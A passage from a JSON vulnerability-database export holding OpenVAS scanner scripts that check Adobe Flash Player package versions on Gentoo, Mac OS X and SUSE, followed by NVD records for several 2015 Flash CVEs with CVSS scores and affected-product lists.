\"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201504-07\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.457\"), vulnerable: make_list(\"lt 11.2.202.457\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-04-20T00:00:00", "id": "OPENVAS:1361412562310805465", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805465", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Mac OS X)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805465\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3043\", \"CVE-2015-3042\", \"CVE-2015-3041\",\n \"CVE-2015-3040\", \"CVE-2015-3039\", \"CVE-2015-3038\", \"CVE-2015-0360\",\n \"CVE-2015-0359\", \"CVE-2015-0357\", \"CVE-2015-0356\", \"CVE-2015-0355\",\n \"CVE-2015-0354\", \"CVE-2015-0353\", \"CVE-2015-0352\", \"CVE-2015-0351\",\n \"CVE-2015-0350\", \"CVE-2015-0349\", \"CVE-2015-0348\", \"CVE-2015-0347\",\n \"CVE-2015-0346\", \"CVE-2015-0358\");\n script_bugtraq_id(74065, 74062, 74068, 74064, 74067, 74066, 74069);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-20 12:42:00 +0530 (Mon, 20 Apr 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple unspecified use-after-free errors.\n\n - Multiple unspecified double free vulnerabilities.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Improper restriction of discovery of memory addresses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service, execute arbitrary code, bypass the ASLR\n protection mechanism via unspecified vectors and allow local users to gain\n privileges .\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.281 or 17.0.0.169 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.281\"))\n{\n fix = \"13.0.0.281\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.168\"))\n{\n fix = \"17.0.0.169\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "Gentoo Linux Local Security Checks GLSA 201505-02", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121376", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201505-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201505-02.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121376\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:49 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201505-02\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201505-02\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201505-02\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.460 \"), vulnerable: make_list(\"lt 11.2.202.460 \"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:37:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851099", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0878-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851099\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:00:42 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0878-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the referenced Adobe Security Bulletin APSB15-09.\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0878-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.460~83.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.460~83.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:03:03", "description": "Use-after-free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-0349, CVE-2015-0351, and CVE-2015-0358.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3039", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3039"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3039", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux does not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism via unspecified vectors, a different vulnerability than CVE-2015-0357.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3040", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3040"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3040", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Double free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-0346.\n<a href=\"http://cwe.mitre.org/data/definitions/415.html\">CWE-415: Double Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0359", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0359"], "modified": "2017-10-07T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3043.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3042", "type": "cve", "cwe": ["NVD-CWE-noinfo"], 